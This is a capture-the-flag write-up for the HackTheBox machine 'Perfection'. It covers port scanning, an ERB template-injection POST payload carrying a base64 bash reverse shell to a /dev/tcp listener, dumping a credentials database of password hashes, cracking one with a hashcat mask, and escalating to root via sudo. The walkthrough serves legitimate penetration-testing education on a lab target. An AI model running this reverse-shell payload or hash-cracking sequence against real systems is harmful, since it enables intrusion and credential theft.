Perfection HTB Writeup | HacktheBox

By /

Introduction

In this post, You will learn how to CTF Perfection from HacktheBox, If you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts

Let’s Hack Perfection HTB 😌

Enumeration

First, we start by checking out the target’s IP address using a tool called Nmap. Nmap helps us figure out what ports are open and what services are running on those ports.

So, after running Nmap, we find out that two ports are open: 22 (for SSH) and 80 (for HTTP). This means there might be a way to remotely access the system through SSH, and there’s likely a website hosted on the target.

Also, the details we get from the scan suggest that the operating system is probably Ubuntu Linux.

Now, let’s break down the command “sudo nmap -sC -sV 10.129.216.68”:

“sudo” is used to give the command extra permission to do its job properly.“-sC” runs some default scripts to dig deeper into the services and get more info about them.“-sV” tries to figure out the exact version of the services running.And finally, “10.129.216.68” is the IP address we’re targeting.

sudo nmap -sC -sV 10.129.216.68
[sudo] password for kali:
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-03-07 21:47 CET
Nmap scan report for 10.129.216.68
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

Website

The HTTP port has a server that serves web pages. This website has places where we can type stuff, and we might be able to put in our own code there.

Start Listener

Next, we’re going to use a tool called Netcat to wait for connections coming in. We’ll use the command “nc -lvnp 7373” to do this. Here, “nc” stands for Netcat, which is a handy networking tool.

The flags we’re using (-l for listen mode, -v for verbose mode, -n to show numeric-only IP addresses, and -p to specify the port) help us set up a listener on port 7373. We’re expecting the target to send us a reverse shell through this port.

nc -lvnp 7373
listening on [any] 7373 …
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582

Generate Payload

Using hURL to encode and decode payloads demonstrates how we can mess around with data to take advantage of weaknesses in web applications.

Specifically, the payload we’re making for the Weighted Grade Calculator app is made to run a reverse shell command. This way, we can exploit any possible vulnerabilities that let us run code on the server’s side.

┌──(kali㉿kali)-[~]
└─$ hURL -B “bash -i >& /dev/tcp/10.10.14.213/7373 0>&1”
Original :: bash -i >& /dev/tcp/10.10.14.213/7373 0>&1
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx
┌──(kali㉿kali)-[~]
└─$ hURL -U “YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx”
Original :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx
URL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx

Inject Payload

First, use Burpsuite to grab the POST Request. After that, put in the Payload.

Payload

grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx|+base64+-d+|+bash");%25>1

User Flag and Hash

Boom! We’ve got our Reverse Shell Connection. Now, we can get the User Flag and Susan’s hash.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 7373
listening on [any] 7373 …
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$ ls
ls
main.rb
public
views
susan@perfection:~/ruby_app$ cd /home
cd /home
susan@perfection:/home$ ls
ls
susan
susan@perfection:/home$ cd susan
cd susan
susan@perfection:~$ ls
ls
Migration
ruby_app
user.txt
susan@perfection:~$ cat user.txt
cat user.txt
2034XXXXXXXXXXXXXXXXXXXXXXX96ab
susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
susan@perfection:~/Migration$ strings pupilpath_credentials.db
strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Miller<HASH>

Crack the Hash

┌──(kali㉿kali)-[~]
└─$ echo “<HASH>” > hash.txt
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
<HASH>:susan_nasus_4XXXXXXX0
Session……….: hashcat
Status………..: Cracked
Hash.Mode……..: 1400 (SHA2-256)
Hash.Target……: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934…39023f
Time.Started…..: Thu Mar 7 22:22:07 2024 (2 mins, 16 secs)
Time.Estimated…: Thu Mar 7 22:24:23 2024 (0 secs)
Kernel.Feature…: Pure Kernel
Guess.Mask…….: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 2614.7 kH/s (0.39ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered……..: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress………: 324558848/1000000000 (32.46%)
Rejected………: 0/324558848 (0.00%)
Restore.Point….: 324554752/1000000000 (32.46%)
Restore.Sub.#1…: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1….: susan_nasus_058540610 -> susan_nasus_803824210
Hardware.Mon.#1..: Util: 32%

Login with Root

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
susan@perfection:~$ sudo su
root@perfection:/home/susan# cat /root/root.txt
<FLAG>

Conclusion

In summary, this Perfection HTB box offered valuable lessons in network security and penetration testing. Through practical exercises, we learned to identify and exploit vulnerabilities effectively. This experience highlights the importance of robust security measures in protecting systems from cyber threats.

FAQs

  1. What is Perfection HTB?

Perfection
HTB is a challenging virtual machine on the HacktheBox platform, designed to
test and enhance penetration testing skills.

  1. Which tools are used for enumeration in Perfection HTB?

Tools like
Nmap, Netcat, and Burpsuite are commonly used for enumeration in Perfection
HTB.

  1. How can I generate payloads for exploitation?

Payloads
can be generated using tools like hURL, tailored to exploit specific
vulnerabilities in the target system.

  1. What is the significance of cracking hashes in ethical hacking?

Cracking
hashes allows hackers to escalate privileges, gain unauthorized access, and
further penetrate target systems.

  1. Why is root access crucial in hacking challenges like Perfection
    HTB?

Root access
grants hackers full control over target systems, enabling them to explore
hidden files, escalate privileges, and complete hacking objectives.

Leave a Comment

Your email address will not be published. Required fields are marked *

©2024 Copyright HackerHQ All Right Reseved

Scroll to Top